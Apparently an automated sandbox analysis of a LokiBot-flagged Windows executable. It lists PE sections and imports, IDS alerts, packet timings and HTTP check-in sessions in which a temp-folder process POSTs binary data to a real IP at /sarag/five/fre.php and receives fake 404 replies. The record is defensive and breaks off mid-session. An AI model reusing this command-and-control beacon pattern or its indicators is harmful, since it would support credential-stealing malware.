                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x65150x6600False0.661534926471data6.43970794855IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata0x80000x139a0x1400False0.45data5.14577456407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0xa0000x203380x600False0.499348958333data4.01369865045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x3b0000xa500xc00False0.402018229167data4.18462166815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_ICON0x3b1900x2e8dataEnglishUnited States
                RT_DIALOG0x3b4780x100dataEnglishUnited States
                RT_DIALOG0x3b5780x11cdataEnglishUnited States
                RT_DIALOG0x3b6980x60dataEnglishUnited States
                RT_GROUP_ICON0x3b6f80x14dataEnglishUnited States
                RT_MANIFEST0x3b7100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                DLLImport
                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                05/05/22-09:03:09.858142 05/05/22-09:03:09.858142TCP2825766ETPRO TROJAN LokiBot Checkin M24976880192.168.2.637.0.11.227
                05/05/22-09:04:35.877050 05/05/22-09:04:35.877050TCP2025483ET TROJAN LokiBot Fake 404 Response804982937.0.11.227192.168.2.6
                05/05/22-09:03:36.699615 05/05/22-09:03:36.699615TCP2825766ETPRO TROJAN LokiBot Checkin M24978580192.168.2.637.0.11.227
                05/05/22-09:04:28.261969 05/05/22-09:04:28.261969TCP2825766ETPRO TROJAN LokiBot Checkin M24982380192.168.2.637.0.11.227
                05/05/22-09:04:39.957450 05/05/22-09:04:39.957450TCP2025483ET TROJAN LokiBot Fake 404 Response804985237.0.11.227192.168.2.6
                05/05/22-09:04:12.471516 05/05/22-09:04:12.471516TCP2825766ETPRO TROJAN LokiBot Checkin M24981380192.168.2.637.0.11.227
                05/05/22-09:03:12.937504 05/05/22-09:03:12.937504TCP2025483ET TROJAN LokiBot Fake 404 Response804976937.0.11.227192.168.2.6
                05/05/22-09:03:07.037195 05/05/22-09:03:07.037195TCP2825766ETPRO TROJAN LokiBot Checkin M24976780192.168.2.637.0.11.227
                05/05/22-09:03:21.002482 05/05/22-09:03:21.002482TCP2825766ETPRO TROJAN LokiBot Checkin M24977580192.168.2.637.0.11.227
                05/05/22-09:04:10.170641 05/05/22-09:04:10.170641TCP2825766ETPRO TROJAN LokiBot Checkin M24981080192.168.2.637.0.11.227
                05/05/22-09:04:35.796885 05/05/22-09:04:35.796885TCP2825766ETPRO TROJAN LokiBot Checkin M24982980192.168.2.637.0.11.227
                05/05/22-09:03:15.560942 05/05/22-09:03:15.560942TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.637.0.11.227
                05/05/22-09:04:38.680257 05/05/22-09:04:38.680257TCP2825766ETPRO TROJAN LokiBot Checkin M24984380192.168.2.637.0.11.227
                05/05/22-09:03:53.769658 05/05/22-09:03:53.769658TCP2025483ET TROJAN LokiBot Fake 404 Response804980037.0.11.227192.168.2.6
                05/05/22-09:04:39.884991 05/05/22-09:04:39.884991TCP2825766ETPRO TROJAN LokiBot Checkin M24985280192.168.2.637.0.11.227
                05/05/22-09:03:59.720062 05/05/22-09:03:59.720062TCP2825766ETPRO TROJAN LokiBot Checkin M24980580192.168.2.637.0.11.227
                05/05/22-09:04:13.541988 05/05/22-09:04:13.541988TCP2825766ETPRO TROJAN LokiBot Checkin M24981480192.168.2.637.0.11.227
                05/05/22-09:03:28.128087 05/05/22-09:03:28.128087TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.637.0.11.227
                05/05/22-09:03:23.816864 05/05/22-09:03:23.816864TCP2025483ET TROJAN LokiBot Fake 404 Response804977737.0.11.227192.168.2.6
                05/05/22-09:03:34.422181 05/05/22-09:03:34.422181TCP2025483ET TROJAN LokiBot Fake 404 Response804978237.0.11.227192.168.2.6
                05/05/22-09:04:28.342609 05/05/22-09:04:28.342609TCP2025483ET TROJAN LokiBot Fake 404 Response804982337.0.11.227192.168.2.6
                05/05/22-09:04:55.790210 05/05/22-09:04:55.790210TCP2825766ETPRO TROJAN LokiBot Checkin M24988880192.168.2.637.0.11.227
                05/05/22-09:04:08.408376 05/05/22-09:04:08.408376TCP2025483ET TROJAN LokiBot Fake 404 Response804980937.0.11.227192.168.2.6
                05/05/22-09:04:59.232856 05/05/22-09:04:59.232856TCP2825766ETPRO TROJAN LokiBot Checkin M24988980192.168.2.637.0.11.227
                05/05/22-09:03:50.056619 05/05/22-09:03:50.056619TCP2025483ET TROJAN LokiBot Fake 404 Response804979537.0.11.227192.168.2.6
                05/05/22-09:03:38.754662 05/05/22-09:03:38.754662TCP2025483ET TROJAN LokiBot Fake 404 Response804978637.0.11.227192.168.2.6
                05/05/22-09:04:16.734863 05/05/22-09:04:16.734863TCP2025483ET TROJAN LokiBot Fake 404 Response804981737.0.11.227192.168.2.6
                05/05/22-09:04:49.277684 05/05/22-09:04:49.277684TCP2825766ETPRO TROJAN LokiBot Checkin M24987880192.168.2.637.0.11.227
                05/05/22-09:03:15.634564 05/05/22-09:03:15.634564TCP2025483ET TROJAN LokiBot Fake 404 Response804977137.0.11.227192.168.2.6
                05/05/22-09:03:41.636991 05/05/22-09:03:41.636991TCP2825766ETPRO TROJAN LokiBot Checkin M24978980192.168.2.637.0.11.227
                05/05/22-09:04:23.251156 05/05/22-09:04:23.251156TCP2825766ETPRO TROJAN LokiBot Checkin M24982080192.168.2.637.0.11.227
                05/05/22-09:04:08.330586 05/05/22-09:04:08.330586TCP2825766ETPRO TROJAN LokiBot Checkin M24980980192.168.2.637.0.11.227
                05/05/22-09:04:19.274633 05/05/22-09:04:19.274633TCP2025483ET TROJAN LokiBot Fake 404 Response804981837.0.11.227192.168.2.6
                05/05/22-09:04:52.517389 05/05/22-09:04:52.517389TCP2025483ET TROJAN LokiBot Fake 404 Response804988437.0.11.227192.168.2.6
                05/05/22-09:03:19.667259 05/05/22-09:03:19.667259TCP2825766ETPRO TROJAN LokiBot Checkin M24977480192.168.2.637.0.11.227
                05/05/22-09:03:19.744928 05/05/22-09:03:19.744928TCP2025483ET TROJAN LokiBot Fake 404 Response804977437.0.11.227192.168.2.6
                05/05/22-09:03:59.790812 05/05/22-09:03:59.790812TCP2025483ET TROJAN LokiBot Fake 404 Response804980537.0.11.227192.168.2.6
                05/05/22-09:03:53.694089 05/05/22-09:03:53.694089TCP2825766ETPRO TROJAN LokiBot Checkin M24980080192.168.2.637.0.11.227
                05/05/22-09:03:32.413288 05/05/22-09:03:32.413288TCP2025483ET TROJAN LokiBot Fake 404 Response804978137.0.11.227192.168.2.6
                05/05/22-09:04:13.632225 05/05/22-09:04:13.632225TCP2025483ET TROJAN LokiBot Fake 404 Response804981437.0.11.227192.168.2.6
                05/05/22-09:04:31.539372 05/05/22-09:04:31.539372TCP2025483ET TROJAN LokiBot Fake 404 Response804982437.0.11.227192.168.2.6
                05/05/22-09:04:34.327413 05/05/22-09:04:34.327413TCP2825766ETPRO TROJAN LokiBot Checkin M24982680192.168.2.637.0.11.227
                05/05/22-09:04:15.192814 05/05/22-09:04:15.192814TCP2825766ETPRO TROJAN LokiBot Checkin M24981580192.168.2.637.0.11.227
                05/05/22-09:04:31.451012 05/05/22-09:04:31.451012TCP2825766ETPRO TROJAN LokiBot Checkin M24982480192.168.2.637.0.11.227
                05/05/22-09:04:02.283800 05/05/22-09:04:02.283800TCP2825766ETPRO TROJAN LokiBot Checkin M24980680192.168.2.637.0.11.227
                05/05/22-09:04:46.075139 05/05/22-09:04:46.075139TCP2025483ET TROJAN LokiBot Fake 404 Response804987037.0.11.227192.168.2.6
                05/05/22-09:03:18.553557 05/05/22-09:03:18.553557TCP2025483ET TROJAN LokiBot Fake 404 Response804977337.0.11.227192.168.2.6
                05/05/22-09:04:04.665456 05/05/22-09:04:04.665456TCP2825766ETPRO TROJAN LokiBot Checkin M24980780192.168.2.637.0.11.227
                05/05/22-09:03:21.096855 05/05/22-09:03:21.096855TCP2025483ET TROJAN LokiBot Fake 404 Response804977537.0.11.227192.168.2.6
                05/05/22-09:03:41.723970 05/05/22-09:03:41.723970TCP2025483ET TROJAN LokiBot Fake 404 Response804978937.0.11.227192.168.2.6
                05/05/22-09:04:41.937804 05/05/22-09:04:41.937804TCP2025483ET TROJAN LokiBot Fake 404 Response804986037.0.11.227192.168.2.6
                05/05/22-09:04:04.748843 05/05/22-09:04:04.748843TCP2025483ET TROJAN LokiBot Fake 404 Response804980737.0.11.227192.168.2.6
                05/05/22-09:04:37.500711 05/05/22-09:04:37.500711TCP2025483ET TROJAN LokiBot Fake 404 Response804983637.0.11.227192.168.2.6
                05/05/22-09:04:41.860008 05/05/22-09:04:41.860008TCP2825766ETPRO TROJAN LokiBot Checkin M24986080192.168.2.637.0.11.227
                05/05/22-09:03:12.865476 05/05/22-09:03:12.865476TCP2825766ETPRO TROJAN LokiBot Checkin M24976980192.168.2.637.0.11.227
                05/05/22-09:04:23.331387 05/05/22-09:04:23.331387TCP2025483ET TROJAN LokiBot Fake 404 Response804982037.0.11.227192.168.2.6
                05/05/22-09:04:11.254199 05/05/22-09:04:11.254199TCP2825766ETPRO TROJAN LokiBot Checkin M24981280192.168.2.637.0.11.227
                05/05/22-09:04:37.419767 05/05/22-09:04:37.419767TCP2825766ETPRO TROJAN LokiBot Checkin M24983680192.168.2.637.0.11.227
                05/05/22-09:04:02.366760 05/05/22-09:04:02.366760TCP2025483ET TROJAN LokiBot Fake 404 Response804980637.0.11.227192.168.2.6
                05/05/22-09:03:36.774475 05/05/22-09:03:36.774475TCP2025483ET TROJAN LokiBot Fake 404 Response804978537.0.11.227192.168.2.6
                05/05/22-09:03:28.213243 05/05/22-09:03:28.213243TCP2025483ET TROJAN LokiBot Fake 404 Response804978037.0.11.227192.168.2.6
                05/05/22-09:04:34.426102 05/05/22-09:04:34.426102TCP2025483ET TROJAN LokiBot Fake 404 Response804982637.0.11.227192.168.2.6
                05/05/22-09:04:52.431554 05/05/22-09:04:52.431554TCP2825766ETPRO TROJAN LokiBot Checkin M24988480192.168.2.637.0.11.227
                05/05/22-09:04:11.362368 05/05/22-09:04:11.362368TCP2025483ET TROJAN LokiBot Fake 404 Response804981237.0.11.227192.168.2.6
                05/05/22-09:04:59.311464 05/05/22-09:04:59.311464TCP2025483ET TROJAN LokiBot Fake 404 Response804988937.0.11.227192.168.2.6
                05/05/22-09:04:15.285620 05/05/22-09:04:15.285620TCP2025483ET TROJAN LokiBot Fake 404 Response804981537.0.11.227192.168.2.6
                05/05/22-09:04:26.555558 05/05/22-09:04:26.555558TCP2825766ETPRO TROJAN LokiBot Checkin M24982280192.168.2.637.0.11.227
                05/05/22-09:03:38.682237 05/05/22-09:03:38.682237TCP2825766ETPRO TROJAN LokiBot Checkin M24978680192.168.2.637.0.11.227
                05/05/22-09:04:19.192332 05/05/22-09:04:19.192332TCP2825766ETPRO TROJAN LokiBot Checkin M24981880192.168.2.637.0.11.227
                05/05/22-09:03:14.097517 05/05/22-09:03:14.097517TCP2825766ETPRO TROJAN LokiBot Checkin M24977080192.168.2.637.0.11.227
                05/05/22-09:04:49.395443 05/05/22-09:04:49.395443TCP2025483ET TROJAN LokiBot Fake 404 Response804987837.0.11.227192.168.2.6
                05/05/22-09:03:44.385995 05/05/22-09:03:44.385995TCP2825766ETPRO TROJAN LokiBot Checkin M24979480192.168.2.637.0.11.227
                05/05/22-09:04:26.632343 05/05/22-09:04:26.632343TCP2025483ET TROJAN LokiBot Fake 404 Response804982237.0.11.227192.168.2.6
                05/05/22-09:03:17.152559 05/05/22-09:03:17.152559TCP2825766ETPRO TROJAN LokiBot Checkin M24977280192.168.2.637.0.11.227
                05/05/22-09:04:10.259654 05/05/22-09:04:10.259654TCP2025483ET TROJAN LokiBot Fake 404 Response804981037.0.11.227192.168.2.6
                05/05/22-09:03:34.349918 05/05/22-09:03:34.349918TCP2825766ETPRO TROJAN LokiBot Checkin M24978280192.168.2.637.0.11.227
                05/05/22-09:04:16.658933 05/05/22-09:04:16.658933TCP2825766ETPRO TROJAN LokiBot Checkin M24981780192.168.2.637.0.11.227
                05/05/22-09:03:49.975068 05/05/22-09:03:49.975068TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.637.0.11.227
                05/05/22-09:03:14.179365 05/05/22-09:03:14.179365TCP2025483ET TROJAN LokiBot Fake 404 Response804977037.0.11.227192.168.2.6
                05/05/22-09:04:55.868892 05/05/22-09:04:55.868892TCP2025483ET TROJAN LokiBot Fake 404 Response804988837.0.11.227192.168.2.6
                05/05/22-09:03:17.233312 05/05/22-09:03:17.233312TCP2025483ET TROJAN LokiBot Fake 404 Response804977237.0.11.227192.168.2.6
                05/05/22-09:03:23.742147 05/05/22-09:03:23.742147TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.637.0.11.227
                05/05/22-09:04:12.550162 05/05/22-09:04:12.550162TCP2025483ET TROJAN LokiBot Fake 404 Response804981337.0.11.227192.168.2.6
                05/05/22-09:03:32.333463 05/05/22-09:03:32.333463TCP2825766ETPRO TROJAN LokiBot Checkin M24978180192.168.2.637.0.11.227
                05/05/22-09:03:44.460093 05/05/22-09:03:44.460093TCP2025483ET TROJAN LokiBot Fake 404 Response804979437.0.11.227192.168.2.6
                05/05/22-09:04:38.761471 05/05/22-09:04:38.761471TCP2025483ET TROJAN LokiBot Fake 404 Response804984337.0.11.227192.168.2.6
                05/05/22-09:03:18.475481 05/05/22-09:03:18.475481TCP2825766ETPRO TROJAN LokiBot Checkin M24977380192.168.2.637.0.11.227
                05/05/22-09:04:45.993104 05/05/22-09:04:45.993104TCP2825766ETPRO TROJAN LokiBot Checkin M24987080192.168.2.637.0.11.227
                TimestampSource PortDest PortSource IPDest IP
                May 5, 2022 09:03:07.008596897 CEST4976780192.168.2.637.0.11.227
                May 5, 2022 09:03:07.034276962 CEST804976737.0.11.227192.168.2.6
                May 5, 2022 09:03:07.034410000 CEST4976780192.168.2.637.0.11.227
                May 5, 2022 09:03:07.037194967 CEST4976780192.168.2.637.0.11.227
                May 5, 2022 09:03:07.062997103 CEST804976737.0.11.227192.168.2.6
                May 5, 2022 09:03:07.063096046 CEST4976780192.168.2.637.0.11.227
                May 5, 2022 09:03:07.089371920 CEST804976737.0.11.227192.168.2.6
                May 5, 2022 09:03:07.122899055 CEST804976737.0.11.227192.168.2.6
                May 5, 2022 09:03:07.122916937 CEST804976737.0.11.227192.168.2.6
                May 5, 2022 09:03:07.122991085 CEST4976780192.168.2.637.0.11.227
                May 5, 2022 09:03:07.123037100 CEST4976780192.168.2.637.0.11.227
                May 5, 2022 09:03:07.148745060 CEST804976737.0.11.227192.168.2.6
                May 5, 2022 09:03:09.763923883 CEST4976880192.168.2.637.0.11.227
                May 5, 2022 09:03:09.793576956 CEST804976837.0.11.227192.168.2.6
                May 5, 2022 09:03:09.793735027 CEST4976880192.168.2.637.0.11.227
                May 5, 2022 09:03:09.858141899 CEST4976880192.168.2.637.0.11.227
                May 5, 2022 09:03:09.884032011 CEST804976837.0.11.227192.168.2.6
                May 5, 2022 09:03:09.884098053 CEST4976880192.168.2.637.0.11.227
                May 5, 2022 09:03:09.914124966 CEST804976837.0.11.227192.168.2.6
                May 5, 2022 09:03:09.932703018 CEST804976837.0.11.227192.168.2.6
                May 5, 2022 09:03:09.932727098 CEST804976837.0.11.227192.168.2.6
                May 5, 2022 09:03:09.932848930 CEST4976880192.168.2.637.0.11.227
                May 5, 2022 09:03:09.963745117 CEST4976880192.168.2.637.0.11.227
                May 5, 2022 09:03:09.989967108 CEST804976837.0.11.227192.168.2.6
                May 5, 2022 09:03:12.835882902 CEST4976980192.168.2.637.0.11.227
                May 5, 2022 09:03:12.861630917 CEST804976937.0.11.227192.168.2.6
                May 5, 2022 09:03:12.861782074 CEST4976980192.168.2.637.0.11.227
                May 5, 2022 09:03:12.865475893 CEST4976980192.168.2.637.0.11.227
                May 5, 2022 09:03:12.891032934 CEST804976937.0.11.227192.168.2.6
                May 5, 2022 09:03:12.891123056 CEST4976980192.168.2.637.0.11.227
                May 5, 2022 09:03:12.916687965 CEST804976937.0.11.227192.168.2.6
                May 5, 2022 09:03:12.937504053 CEST804976937.0.11.227192.168.2.6
                May 5, 2022 09:03:12.937541008 CEST804976937.0.11.227192.168.2.6
                May 5, 2022 09:03:12.937720060 CEST4976980192.168.2.637.0.11.227
                May 5, 2022 09:03:12.937825918 CEST4976980192.168.2.637.0.11.227
                May 5, 2022 09:03:12.963382006 CEST804976937.0.11.227192.168.2.6
                May 5, 2022 09:03:14.068048000 CEST4977080192.168.2.637.0.11.227
                May 5, 2022 09:03:14.094139099 CEST804977037.0.11.227192.168.2.6
                May 5, 2022 09:03:14.094289064 CEST4977080192.168.2.637.0.11.227
                May 5, 2022 09:03:14.097517014 CEST4977080192.168.2.637.0.11.227
                May 5, 2022 09:03:14.123411894 CEST804977037.0.11.227192.168.2.6
                May 5, 2022 09:03:14.123611927 CEST4977080192.168.2.637.0.11.227
                May 5, 2022 09:03:14.149259090 CEST804977037.0.11.227192.168.2.6
                May 5, 2022 09:03:14.179364920 CEST804977037.0.11.227192.168.2.6
                May 5, 2022 09:03:14.179394007 CEST804977037.0.11.227192.168.2.6
                May 5, 2022 09:03:14.179505110 CEST4977080192.168.2.637.0.11.227
                May 5, 2022 09:03:14.179599047 CEST4977080192.168.2.637.0.11.227
                May 5, 2022 09:03:14.205180883 CEST804977037.0.11.227192.168.2.6
                May 5, 2022 09:03:15.511389971 CEST4977180192.168.2.637.0.11.227
                May 5, 2022 09:03:15.537208080 CEST804977137.0.11.227192.168.2.6
                May 5, 2022 09:03:15.537349939 CEST4977180192.168.2.637.0.11.227
                May 5, 2022 09:03:15.560941935 CEST4977180192.168.2.637.0.11.227
                May 5, 2022 09:03:15.586477995 CEST804977137.0.11.227192.168.2.6
                May 5, 2022 09:03:15.586561918 CEST4977180192.168.2.637.0.11.227
                May 5, 2022 09:03:15.612042904 CEST804977137.0.11.227192.168.2.6
                May 5, 2022 09:03:15.634563923 CEST804977137.0.11.227192.168.2.6
                May 5, 2022 09:03:15.634641886 CEST804977137.0.11.227192.168.2.6
                May 5, 2022 09:03:15.634706020 CEST4977180192.168.2.637.0.11.227
                May 5, 2022 09:03:15.634730101 CEST4977180192.168.2.637.0.11.227
                May 5, 2022 09:03:15.660309076 CEST804977137.0.11.227192.168.2.6
                May 5, 2022 09:03:17.115257025 CEST4977280192.168.2.637.0.11.227
                May 5, 2022 09:03:17.140842915 CEST804977237.0.11.227192.168.2.6
                May 5, 2022 09:03:17.140974045 CEST4977280192.168.2.637.0.11.227
                May 5, 2022 09:03:17.152559042 CEST4977280192.168.2.637.0.11.227
                May 5, 2022 09:03:17.179627895 CEST804977237.0.11.227192.168.2.6
                May 5, 2022 09:03:17.179826975 CEST4977280192.168.2.637.0.11.227
                May 5, 2022 09:03:17.205264091 CEST804977237.0.11.227192.168.2.6
                May 5, 2022 09:03:17.233311892 CEST804977237.0.11.227192.168.2.6
                May 5, 2022 09:03:17.233342886 CEST804977237.0.11.227192.168.2.6
                May 5, 2022 09:03:17.233416080 CEST4977280192.168.2.637.0.11.227
                May 5, 2022 09:03:17.233483076 CEST4977280192.168.2.637.0.11.227
                May 5, 2022 09:03:17.259035110 CEST804977237.0.11.227192.168.2.6
                May 5, 2022 09:03:18.446068048 CEST4977380192.168.2.637.0.11.227
                May 5, 2022 09:03:18.471705914 CEST804977337.0.11.227192.168.2.6
                May 5, 2022 09:03:18.471883059 CEST4977380192.168.2.637.0.11.227
                May 5, 2022 09:03:18.475481033 CEST4977380192.168.2.637.0.11.227
                May 5, 2022 09:03:18.501147032 CEST804977337.0.11.227192.168.2.6
                May 5, 2022 09:03:18.501246929 CEST4977380192.168.2.637.0.11.227
                May 5, 2022 09:03:18.526817083 CEST804977337.0.11.227192.168.2.6
                May 5, 2022 09:03:18.553556919 CEST804977337.0.11.227192.168.2.6
                May 5, 2022 09:03:18.553594112 CEST804977337.0.11.227192.168.2.6
                May 5, 2022 09:03:18.553699970 CEST4977380192.168.2.637.0.11.227
                May 5, 2022 09:03:18.553845882 CEST4977380192.168.2.637.0.11.227
                May 5, 2022 09:03:18.579346895 CEST804977337.0.11.227192.168.2.6
                May 5, 2022 09:03:19.636962891 CEST4977480192.168.2.637.0.11.227
                May 5, 2022 09:03:19.662707090 CEST804977437.0.11.227192.168.2.6
                May 5, 2022 09:03:19.662836075 CEST4977480192.168.2.637.0.11.227
                May 5, 2022 09:03:19.667258978 CEST4977480192.168.2.637.0.11.227
                May 5, 2022 09:03:19.692847013 CEST804977437.0.11.227192.168.2.6
                May 5, 2022 09:03:19.692965984 CEST4977480192.168.2.637.0.11.227
                May 5, 2022 09:03:19.718905926 CEST804977437.0.11.227192.168.2.6
                May 5, 2022 09:03:19.744927883 CEST804977437.0.11.227192.168.2.6
                May 5, 2022 09:03:19.744971037 CEST804977437.0.11.227192.168.2.6
                May 5, 2022 09:03:19.745064974 CEST4977480192.168.2.637.0.11.227
                May 5, 2022 09:03:19.745179892 CEST4977480192.168.2.637.0.11.227
                May 5, 2022 09:03:19.770826101 CEST804977437.0.11.227192.168.2.6
                May 5, 2022 09:03:20.972738981 CEST4977580192.168.2.637.0.11.227
                May 5, 2022 09:03:20.998657942 CEST804977537.0.11.227192.168.2.6
                May 5, 2022 09:03:20.999085903 CEST4977580192.168.2.637.0.11.227
                May 5, 2022 09:03:21.002481937 CEST4977580192.168.2.637.0.11.227
                • 37.0.11.227
                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.64976737.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:07.037194967 CEST1126OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 196
                Connection: close
                May 5, 2022 09:03:07.122899055 CEST1126INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:07 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 15
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.64976837.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:09.858141899 CEST1127OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 196
                Connection: close
                May 5, 2022 09:03:09.932703018 CEST1127INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:09 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 15
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.2.64978037.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:28.128087044 CEST1186OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:28.213243008 CEST1186INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:28 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.2.64978137.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:32.333462954 CEST1187OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:32.413288116 CEST1188INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:32 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.2.64978237.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:34.349917889 CEST1189OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:34.422180891 CEST1190INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:34 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.2.64978537.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:36.699615002 CEST1221OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
